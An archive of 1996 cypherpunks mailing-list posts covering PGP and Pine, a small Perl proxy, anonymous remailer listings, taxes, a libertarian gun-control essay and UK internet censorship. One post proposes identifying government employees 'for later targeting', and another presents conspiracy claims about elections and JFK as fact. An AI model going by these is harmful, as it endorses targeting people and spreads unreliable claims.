iQEVAwUBMY1o7y1onm9OaF05AQGe2QgAqlY0DRLJVW5puVHYMYc+LpKk+f9SGFEY
VvfIjt3R8lAk3ku+f0Nn9MPSZc31UEZQHkeE7zvctzYtyvQrhxtod+uyX/1YgBct
e1mphAPe/G+SWAnAUmSF6QFhmN9ORFcHbwM5TJI2cJxedbkvvUW5gwvCkdqJ1SLz
Wi6oJwYPjs4Nnvs6zSN0zKpXd+/FS20h+dTyIX9R0WMkkaWYfqQwzC9o4v2Ru2FT
ylxZvFudDhibtUUr6MVawJaAZi99ISEmfFe4T+8kkEQfL6762/lcTmckSG7a7jPR
Fiy/1v0jj9ReNFQ5KL7KPX484h414GUdKAwBnfEERU+mNERNG4EcYg==
=O1go
-----END PGP SIGNATURE-----


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 14:32:41 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: PGP and Pine?
Message-ID: <Pine.SUN.3.93.960505215446.23150G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




Is there a package that integrates PGP and Pine nicely?


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 17:00:10 +0800
To: blanc <cypherpunks@toad.com>
Subject: Re: FW: Why I Pay Too Much in Taxes
Message-ID: <v02120d05adb3383238b7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:27 5/5/96, blanc wrote:

>I have a great idea - let's start a closed, elite mailing list for
>"Offshorepunks".
>Uni, Sandy, & Duncan et al could "show us how it's done".

The list already exists. It was supposed to contain essays by Sandy and
Duncan. It was called "Privacy 101". After two articles hyping the great
info about to follow... nothing. Utter silence.

[What ever happend, anyway?]



Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 17:55:00 +0800
To: Alan Horowitz <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <v02120d06adb3394d7b43@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:48 5/5/96, Alan Horowitz wrote:
><< " I paid approximately 60%...." >>
>
>
>didn't the feudal vassels only pay 33% ?      To paraphrase - I forget
>which Presidential candidate of yore - "are you better off than you were
>a thousand years ago?"
>
>ANd that's not even counting the interest you pay on your mortgage. Count
>that, and the vassels were head and shoulders above Californians.

Generally, the feudal subjects paid the Tithe. Yes, Robin Hood and his men
fought the evil Sheriff of Nottingham for his crushing 10% tax. :-)

[My last post in this off-topic thread.]


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Mon, 6 May 1996 10:17:57 +0800
To: whitaker@extropia.csd.sgi.com>
Subject: Free Life #26 now available.
Message-ID: <Pine.SUN.3.93.960505221821.6598C-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



22:09 05/05/1996 


The article below, is taken from the latest issue 
of Free Life, the journal that I edit.

Comments always welcome!


Sean Gabb
Editor
Free Life

                  A R T I C L E   B E G I N S
=====================================================================                               



                    A TIME TO BE DEPRESSED


As I write, news is coming though on the wireless of a mad gunman
in Tasmania.  Twenty people are said to have been killed, and
many more wounded.  It will not have the same effect on opinion
in this country as the Dunblane massacre, but it will add to the
existing reaction.  There will be more encouragement of people
to hand in their guns at the local Police Station.  There will
be a toughening of the draft Firearms Bill promised for the early
summer.  Whether this really will ban the keeping of guns at
home, it will certainly make them harder for ordinary people to
obtain.

To do so, of course, will not reduce the number of criminal
shootings.  There might be fewer Thomas Hamiltons - though I do
not think there are many of these already.  But there will be no
fewer armed robbers and gangland "executioners".  Indeed, so far
as these might be deterred even by a public so little armed as
ours currently is, there will be more of them.

The real effect of a new Firearms Act will be to mark another
stage in the collapse of English freedom.  The more disarmed we
are, the more armed criminals can move among us like a fox among
chickens.  The more this happens, the more we shall cry for
protection to the authorities that disarmed us in the first
place.  In the short term, this will mean more powers of arrest
and search, and more video cameras in the streets.  In the medium
term, it will mean identity cards.  In the longer term, it will
mean electronic tagging and surveillance, and efforts to isolate
and remove whatever gene might be supposed to incline one to
criminal behaviour.

Now, given the elegance of this scheme, it is hard not to believe
in conspiracies.  It is even tempting to believe in them.  They
not only explain, but also give comfort.  For all their cunning
and malevolence, conspirators have the disadvantage of being a
minority.  They can be exposed, and thereby frustrated.  Inside
every conspiracy theorist is an optimist, never more than three
steps from utopia.  However, the truth is more depressing.  There
are surely people now calling for greater gun control who know
that it cannot work as promised, and who do so for motives that
range from the selfish to the sinister.  But these people are not
the source of the problem.  The real source is a wilfully
ignorant public.  There are millions of people in this country
who take it as common sense that limiting the availability of
guns will also reduce the amount of armed crime; and who will not
listen when told otherwise.  And this does not stand alone.  It
is just another instance of the more general belief, that
government action is the answer to every misfortune.

The belief would be funny were its effects not so dangerous.  A
few children are bitten by dogs.  As if this were a new and
alarming thing, the public demands and the politicians supply the
most imbecile law of the decade.  A ferry sinks because someone
left the door open.  Half the passengers are too drunk to notice
what is happening, and some of them drown.  The result - actual
controls that make crossing the Channel less of an adventure, and
a demand for controls that would make it far more expensive.  A
Minister tells us that most eggs are bad.  After the first wild
panic, the Government has to make a food handling law that shuts
down thousands of catering businesses, and makes food poisoning
more rather than less common.  Last month, the public got into
a sweat about guns.  Then it turned to mad cows.  From today, it
will be thinking about guns again.

Of course, nations have flourished with far greater handicaps
than the Dangerous Dogs Act and the prohibition of wooden
chopping boards.  I will even say that nearly eighty years of gun
control have not yet turned this country into a police state; and
another Firearms Act will not do so purely on its own.  Bad laws
are often tolerable while the structure of laws as a whole
remains stable.  But what we have here is a state of mind that
throws up one bad law after another - a state of mind that will
accept no restraints on its behaviour.  It is no good to say that
a particular freedom or rule of Common Law is worth preserving. 
It is no good saying that it has been established for hundreds
of years.  If it gets in the way of whatever "tough new law" is
currently in fashion, it will be swept aside without regrets or
second thoughts.

Here is the true engine of collapse.  Here is why the latest
instalment of gun control will not terminate in itself, but lead
on to worse.  And here is what I find so depressing about it all. 
For I have no answers to give.  I do not know why the British
public has become so childish, nor what to do about it.  I can
only say that, unless some other cause can be made to intervene,
things will end very badly.

Sean Gabb

======================================================================
    $$$$$$  $$$$$   $$$$$$  $$$$$$     $$      $$   $$$$$$  $$$$$$
    $$      $$   $  $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$$$    $$$$    $$$$    $$$$       $$      $$   $$$$    $$$$
    $$      $$ $    $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$      $$   $  $$$$$$  $$$$$$     $$$$$$  $$   $$      $$$$$$
 
        A Journal of Classical Liberal and Libertarian Thought

    Production:                                   Editorial:
    c/o the Libertarian Alliance                  123a Victoria Way
    25 Chapter Chambers                           Charlton
    London SW1P 4NN                               London SE7 7NX

Tel: **181 858 0841  Fax: **171 834 2031  E-mail: cea01sig@gold.ac.uk

                    EDITOR OF FREE LIFE:  SEAN GABB

======================================================================
                    FOR LIFE, LIBERTY  AND PROPERTY
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Mon, 6 May 1996 17:17:08 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: PGP and Pine?
In-Reply-To: <Pine.SUN.3.93.960505215446.23150G-100000@polaris.mindport.net>
Message-ID: <Pine.BSD/.3.91.960505222505.24544G-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Black Unicorn wrote:
> Is there a package that integrates PGP and Pine nicely?

I haven't found one, but according to the Pine developers, PGP support is 
going to be included in the next version (3.92).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Mon, 6 May 1996 17:33:08 +0800
To: unicorn@schloss.li
Subject: Re: WWW proxies?
In-Reply-To: <v02120d03adb27fe340c9@[192.0.2.1]>
Message-ID: <Pine.BSD/.3.91.960505222735.24544H-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Lucky Green wrote:
> At 0:30 5/5/96, Lou Poppler wrote:
> >On Fri, 26 Apr 1996 19:13:06 -0400 (EDT),
> >Black Unicorn <unicorn@schloss.li> wrote:
> >}
> >} Has anyone developed such a beast yet?

Here's a simple one in 3 lines of perl.  It only supports HTTP GET, and 
it ignores all of the MIME headers on the original request.  It requires the 
LWP perl module, but the RSA code requires dc, so I guess it's fair :)

#!/usr/bin/perl5 --# HTTP proxy, GET/http only;  usage: 'lwp-proxy <port>'
use LWP::Simple;sub w{wait;}$SIG{'CHLD'}='w';$SIG{'CLD'}='w';socket(S,2,1,6);
bind(S,pack(Sna4x8,2,$ARGV[0]));listen(S,5);while(1){accept(N,S);if(!fork){
open(STDERR,">&N");chop($r=<N>);$r=~s/^GET //i;select(N);getprint($r);exit;}}  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 6 May 1996 12:43:52 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605052255.PAA00702@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Stanton McCandlish <mech@eff.org> 05/04/96  5:03pm -0700 
 
= To: tcmay@got.net (Timothy C. May) 
= Date: Sat, 4 May 1996 17:03:31 -0700 (PDT) 
=  
= Timothy C. May typed: 
=  
= > But no Congressman who co-sponsors such legislation as the "National 
= > Wiretap Initiative," with its "1% of the engineering capacity" requirements 
= > and other such Big Brother Surveillance State clauses, is a friend of ours. 
=  
= No legislator at all is our friend.  The legislature is a gateway - we push  
= an issue thru it into the politico-legal system, and other groups push  
= their own issues back through the gateway at us.  Whoever pushes more, and 
= times their pushing with when the gate is open, wins. 
=  
= This isn't about making chums.  Leahy is a gatekeeper, like any other  
= legislator. We don't have to like him, just get him to open the gate for us, 
= and close it for our opponents. 
=  

        _all_ politicians face reelection, all politicians must raise 
    money --special interest groups control large blocks of money, or as
    Mark Twain put it:

        "Congress is the only natural criminal class in America."

    or Will Rogers:

        "Circus?  Why would I want to go to the circus when Congress is 
        in session?"

        the Federal government as a whole certainly is not the friend of
    the people --we have not had a free election since Lincoln in 1860, 
    with the possible exception of JFK, whose only true claim to
    greatness was issuing Treasury notes in May '63 --which circulated
    only until he was assassinated.

        how many _truly_ "populist" presidents have we elected? 
    Jackson, Lincoln, JFK?  Despite the immense fortune (from Joe's
    questionable endeavors); the social connections, even if he was
    Irish-Catholic; and some "ideals" (not necessarily mutually mine),
    JFK was _not_ a product of the establishment, nor the "real" 
    political machine until he "captured" it.  I was a _paid_
    "consultant" in the JFK '60 campaign, and again for Teddy in '62
    --no amount of pain will acquire further discussion of political
    campaign ethics....

        "mech" is correct, IMHO, in the gatekeeper analogy. Therefore, 
    *personal* villification of our "enemies" is counterproductive to 
    our efforts.  unicorn stated:

                "Mind you, I never said Leahy was a giant in the 
            movement for crypto and privacy interests, just that I 
            was glad someone had a clue."

    is not our task to educate the Congress critter?  Is it not better 
    to deal with the critter if he, or his staff, is at least aware of 
    the issues?  again, unicorn further stated v/v Leahy:

                "His staff are some of the most astute people on the
            hill technologically.  That their view might tend to the
            statist side disturbs me, but I wasn't talking about their 
            politics. On the hill a competent and fairly reasonable 
            enemy is much less a problem than an incompetent publicity 
            seeker."

        generally speaking, communication is _not_ facilitated by 
    punching your intended correspondent in the nose. extremist demands 
    are dismissed as such.  maybe I might prefer to clean the house that 
    greed and control built; but, practically, we either work within the
    system as erudite and rational "educators," or the class is ignored, 
    if not labelled "dangerously subversive" --which means we will be 
    first on the roundup....

        however, all of the above ignores reality:  the Federal Reserve 
    Bank, a quasi-government agency with private owners, represents the 
    power. JFK recognized the inherent impossibility of debt reduction 
    when even your interest is borrowed.  The Fed also represents the 
    international big money pool, and the means of historical 
    revisionism and the consolidation of power.

        the "ruling class" underestimated the explosion of the Net, just
    like China underestimated the fax. Now the ruling class is playing 
    catch up, and attempting to sandbag the Net --they probably will not 
    succeed as the Net will go underground around the world --technology
    is moving faster than regulations.  they may kill mainstream 
    information privacy, but the innovation of the underground will 
    outpace their regulations.  Secondly, regulations which are despised
    are ignored and confronted --sure, a few high profile cases will go 
    forward for intimidation --was PKZ granted "Constitutional due 
    process?" --or should I phrase that: "...any due process?"

        unless we are willing to patiently and persistently educate the 
    governing class, no matter how "ignorant" they may appear from our 
    perspective of inalienable rights, the "enlightened" position is 
    dismissed as revolutionary excess, and labelled subversive to the 
    US government.  --and, not only must we educate the governing class,
    but we must educate the people, and the people's media to prevent 
    the governed from surrendering their inalienable rights for a little
    security.

            "They that give up essential liberty to obtain a little 
               temporary safety deserve neither liberty nor safety."

                        --Ben Franklin (Historical Review of PA -1759)

    and, the bottom line is:

              "It is not the function of our Government to keep the citizen
                  from falling into error; 
               it is the function of the citizen to keep the Government 
                  from falling into error."

                             --Robert H. Jackson (1892-1954), U.S. Judge




--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Tim May <tcmay@got.net>
    Black Unicorn <unicorn@schloss.li>
    Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 6 May 1996 18:28:02 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SV4.3.91.960505214552.19234C-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960505230857.24320B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 5 May 1996, Alan Horowitz wrote:

> didn't the feudal vassels only pay 33% ?

Actually, no.  When I used to edit a magazine, I commissioned an
article about how much "tax" slaves, serfs, etc. paid.  That is,
how much of what they produced, did they get to keep; how much
went to their masters.  The surprising, cross-cultural answer my
researcher/writer found was that they got to keep everthing they
produced except 5-10%.  That's a lot better, percentage-wise,
than for modern "tax slaves."


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 6 May 1996 18:38:42 +0800
To: blanc <cypherpunks@toad.com>
Subject: Re: FW: Why I Pay Too Much in Taxes
Message-ID: <m0uGJhs-00095kC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:27 PM 5/5/96 -0700, blanc wrote:
>From: 	Black Unicorn (in reply to TCMay):
>
>> I have no doubt that "tax planning" works for some people, and I think
>> certain people like Vince Cate may do well in places like Anguilla,
>> essentially starting a business from scratch. I even have longterm hopes
>> for tax havens, cyberspace tax havens, anonymous systems, etc. But this
>> ain't happening soon.
>
>Here I'm not so sure I agree.  Several of us are working on making it
>happen, soon.
>..................................................................................................
>
>
>I have a great idea - let's start a closed, elite mailing list for "Offshorepunks".
>Uni, Sandy, & Duncan et al could "show us how it's done".

Let's turn this around, shall we?  I have a theory that within the next few 
years, one of the biggest users of these off-shore accounts will be 
government employees who see their worlds crashing down around them, and 
they want to be able to escape the country with their loot.  Maybe the most 
useful task we could accomplish would be to identify them for later targeting.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 6 May 1996 11:03:58 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605052155.XAA01260@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




Any idea on best remailer?

alpha.c2.org is a roller coaster.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 6 May 1996 16:25:44 +0800
To: unicorn@schloss.li
Subject: Re: Money Laundering Conference with Government Types
Message-ID: <01I4D5XMLHW08Y56Y1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn"  5-MAY-1996 18:25:57.83

>I think that should be

>http://www.oceanalaw.com/20/conf/ml.htm
                ^
	Yes; thank you. Weird spelling.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 7 May 1996 05:54:51 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199605061350.GAA27915@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 6 May 96 6:45:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
shinobi  remailer@shinobi.alias.net       *-*--*+***+*    38:35  99.99%
alpha    alias@alpha.c2.org               +-+++--+.+++  1:16:28  99.99%
hacktic  remailer@utopia.hacktic.nl       +******++***     8:55  99.98%
portal   hfinney@shell.portal.com         ####*-##-###    11:44  99.93%
haystack haystack@holy.cow.net             #+*-**-*#*#    21:39  99.90%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    38:55  99.88%
ecafe    cpunk@remail.ecafe.org             #* -####*#    30:12  99.76%
mix      mixmaster@remail.obscura.com     __._.--++++  13:34:46  99.68%
extropia remail@miron.vip.best.com        -----_.--.-  11:22:42  99.61%
exon     remailer@remailer.nl.com         ##****+*****     2:29  99.53%
flame    remailer@flame.alias.net         -+++ .----+   6:11:21  99.42%
alumni   hal@alumni.caltech.edu           +*##  +#-###    20:24  99.35%
penet    anon@anon.penet.fi               _...____ .   54:35:54  99.35%
c2       remail@c2.org                    +++++- +++++  1:18:29  98.98%
amnesia  amnesia@chardos.connix.com       --______. -  49:22:17  98.80%
vegas    remailer@vegas.gateway.com       #- .---###**  4:29:32  98.30%
replay   remailer@replay.com              ****+   +***     5:21  93.85%
treehole remailer@mockingbird.alias.net       +-----+   2:56:21  90.38%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 7 May 1996 04:33:40 +0800
To: Sandy Sandfort <alanh@infi.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605061419.HAA02540@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 5/5/96 -0700, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Sun, 5 May 1996, Alan Horowitz wrote:
>
>> didn't the feudal vassels only pay 33% ?
>
>Actually, no.  When I used to edit a magazine, I commissioned an
>article about how much "tax" slaves, serfs, etc. paid.  That is,
>how much of what they produced, did they get to keep; how much
>went to their masters.  The surprising, cross-cultural answer my
>researcher/writer found was that they got to keep everthing they
>produced except 5-10%.  That's a lot better, percentage-wise,
>than for modern "tax slaves."


In the early feudal period, ordinary knights did not live well.  
They were only moderately better off than peasants, and yet to support one 
knight, you needed a startlingly large number of peasants, a fact
that kings were continually unhappy about and continually trying
to fix.

While it is difficult to assess the tax rate, because taxes were
in kind, it was clearly very low by modern standards.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 7 May 1996 08:07:37 +0800
To: cypherpunks@toad.com
Subject: UK IP Censorship
Message-ID: <199605061552.IAA15075@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, 6 May 1996

Internet provider to launch censorship

By James Mackintosh in London

Unipalm Pipex, the biggest provider of Internet access to
British businesses, has acceded to government calls for
voluntary censorship in a significant boost to ministerial
attempts to restrict access to electronic pornography.

Pipex is to block much of the worst child pornography from
subscribers and will also be supplying new software to allow
companies to limit the parts of the Internet - the 
international computer network - accessible by staff.

The decision is likely to have far-reaching implications for
the Internet in Britain because Mr Peter Dawe, managing
director of Pipex, is also political officer of the Internet
Service Providers' Association, the body negotiating a
voluntary code of conduct with the government.

Until recently Mr Dawe was opposed to any form of censorship.
But he has now decided to stop supplying discussion groups -
which are devoted to pictures of young children.

The software package will allow subscribers to block parts of
the Internet considered unsuitable, making them accessible
only with a password. As a result, parents will be able to
control which parts of the Internet are available to children,
and managers to ensure staff are not breaking the law.
However, Mr Dawe emphasised the impossibility of completely
blocking offensive parts of the Internet.

Pipex - the UK arm of UUNet of the US - does not expect a
backlash from users over the censorship. Mr Dawe said he was
sure Pipex's corporate users "would be horrified" at what is
available on the Internet. He said that if pornographic
pictures were found on office computers, companies could be
open to prosecution.

Cambridge-based Pipex, which claims more than 60 per cent of
the UK's corporate Internet users, selected which news groups
to block after seeking the advice of police at Scotland Yard
in London. The Obscene Publications Squad confirmed that child
pornography on the Internet had already become a serious
problem. "The majority of the people we deal with have used
news groups," he said. Child pornography had become available
to people who a few years ago would not have known how to find
it.

The approach Pipex has taken fits with the government's
preferred option of a voluntary code of conduct for Internet
providers, leaving censorship matters to users.

---











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 7 May 1996 10:21:34 +0800
To: Jüri_Kaljundi <jk@stallion.ee>
Subject: Re: PGP and Pine?
In-Reply-To: <Pine.BSD/.3.91.960505222505.24544G-100000@bud.indirect.com>
Message-ID: <318E2988.6EB26FF6@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jüri_Kaljundi wrote:
> 
>  Sun, 5 May 1996, Dan McGuirk wrote:
> 
> > I haven't found one, but according to the Pine developers, PGP support is
> > going to be included in the next version (3.92).
> 
> Well the current version is 3.93 already, 3.92 was released long time ago.
> Can't see any special PGP support in those versions.

   There are hooks in 3.92 that can be used to add PGP support. The next
version of premail, 0.44, exploits these hooks. Unfortunately, there's a
bug in Pine 3.93 that prevents it from working correctly. In addition,
the hooks were not made to be MIME-aware, so it only handles vanilla PGP
messages, not PGP/MIME.
   Version 0.44 of premail will be released soon. I have a patch for
Pine, and there are alpha testers who are playing with the code now.

   It's fairly high on my list of priorities to get the integration with
Pine to be really smooth.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 7 May 1996 04:47:16 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: L. Detweiler is a CyberAngel
In-Reply-To: <Pine.GUL.3.93.960505181051.542B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SCO.3.91.960506092756.6576C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Rich Graves wrote:
<snip>

> 
> I believe you can get it at http://www.csn.net/~ldetweil/
> 

Is this stuff collected and published by LD himself, of is someone just 
fronting it?  The tone of the prose seems a little weird, but I wasn't on 
c'punks during his heyday, so I can't tell.  It seems a little too 
self-effacing at times for the style of a net.loon.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
